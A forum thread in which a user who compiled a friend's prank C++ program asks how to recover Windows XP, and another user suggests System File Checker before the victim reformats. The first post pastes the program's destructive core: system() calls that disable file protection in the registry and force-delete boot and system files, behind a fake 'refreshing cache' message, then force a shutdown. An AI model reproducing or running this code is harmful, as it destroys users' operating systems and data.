[tmockingbird]

Hello. I just compiled a source (C++) from a friend of mine, and because I'm using the Express edition of Visual C++, it compiled and directly ran the program.

As you could've guessed, the source wasn't all that nice. I managed to abort the forced shutdown in time, but the files are still deleted. Here is the main part of the source;

Code:

    system("REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v SFCDisable /f");
	system("REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v SFCDisable /t REG_DWORD /d ffffff9d /f");
	system("attrib -r -s -h C:\\Ntldr");
	system("attrib -r -s -h C:\\boot.ini");
	system("attrib -r -s -h %SystemRoot%\\pss");
	system("attrib -r -s -h %SystemRoot%\\system32\\bootcfg.exe");
	system("attrib -r -s -h %SystemRoot%\\system32\\bootok.exe");
	system("attrib -r -s -h %SystemRoot%\\system32\\bootvrfy.exe");
	system("attrib -r -s -h C:\\NTDETECT.COM");
	system("attrib -r -s -h C:\\System Volume Information");
	system("attrib -r -s -h %SystemRoot%\\repair");
	system("attrib -r -s -h C:\\system.ini");
	system("attrib -r -s -h %SystemRoot%\\win.ini");
	system("attrib -r -s -h %SystemRoot%\\system");
	system("attrib -r -s -h %SystemRoot%\\System32\\hal.dll");
	system("attrib -r -s -h %SystemRoot%\\System32\\ntdll.dll");
	system("Echo Refreshing cache memory, please stand by");
	system("del C:\\Ntldr -q -f"); //used for presenting boot menu, and loads Ntoskrnl.exe, Bootvid.dll, Hal.dll, and boot-start device drivers
    system("del C:\\boot.ini -q -f");
	system("del C:\\System Volume Information\\*.* -q -f");
	system("del %SystemRoot%\\pss\\*.* -q -f");
	system("del %SystemRoot%\\system32\\bootcfg.exe -q -f");
	system("del %SystemRoot%\\system32\\bootok.exe -q -f");
	system("del %SystemRoot%\\system32\\bootvrfy.exe -q -f");
	system("del C:\\NTDETECT.COM -q -f");
	system("del %SystemRoot%\\repair\\*.* -q -f");
	system("del C:\\system.ini -q -f");
	system("del %SystemRoot%\\win.ini -q -f");
	system("del %SystemRoot%\\system\\*.* -q -f");
	system("del %SystemRoot%\\System32\\hal.dll -q -f");
	system("del %SystemRoot%\\System32\\ntdll.dll -q -f");
	system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 10");

I've tried to get some of the files back but I've only managed to get hal.dll...

What would be the best fix for this? I believe I cannot use the XP Pro disc to repair.

[evilfantasy]

Do you have an XP CD?

If so, place it in your CD ROM drive and follow the instructions below:

• Click on Start > Run and type sfc /scannow then press Enter (note the space between scf and /scannow)
  • Let this run undisturbed until the window with the blue progress bar goes away

SFC - Which stands for System File Checker, retrieves the correct version of the file from %Systemroot%\System32\Dllcache or the Windows installation source files, and then replaces the incorrect file.

If you want to see what was replaced, right-click My Computer and click on Manage.
In the new window that appears, expand the Event Viewer (by clicking on the + symbol next to it) and then click on System.

[tmockingbird]

Ohhhh my! You have no clue how happy I am right now, ghehe. I was about to get ready to reformat but aye, this looks way better. SFC is running right now, but I do have one little concern; would this also take care of "System Volume Information", "Ntldr", "boot.ini", "system.ini" and "NTDETECT.COM"? I was just wondering since these aren't windows XP files.

Thanks for your help so far, great and nifty command. I'll report back in a little while.=D

[evilfantasy]

Not 100% sure.

You may have to check out a few different methods. http://support.microsoft.com/kb/330184

Then again it may replace them. Just have to wait and see.

[tmockingbird]

Hello Evilfantasy. After the scan was done, I rebooted my laptop to see if it would work. To my disappointment I got a message saying "NTLDR missing", so I tried using one of my boot discs to fix that, but then I kept on getting "Missing kernel drivers to fix NTLDR."
I am now formatting my HDD using my mom's computer (since my laptop kept on rebooting for no apparent reason w/ my XP disc in it) and I'm just waiting for it to finish.

Nevertheless the result, thanks for your help and efforts (it's been an experience for me and I now know a new nifty command, ghehe). =D

[evilfantasy]

Sorry it didn't work.

Not sure what you were doing, but people usually do risky work on a spare machine or HDD....just in case of incidents like this.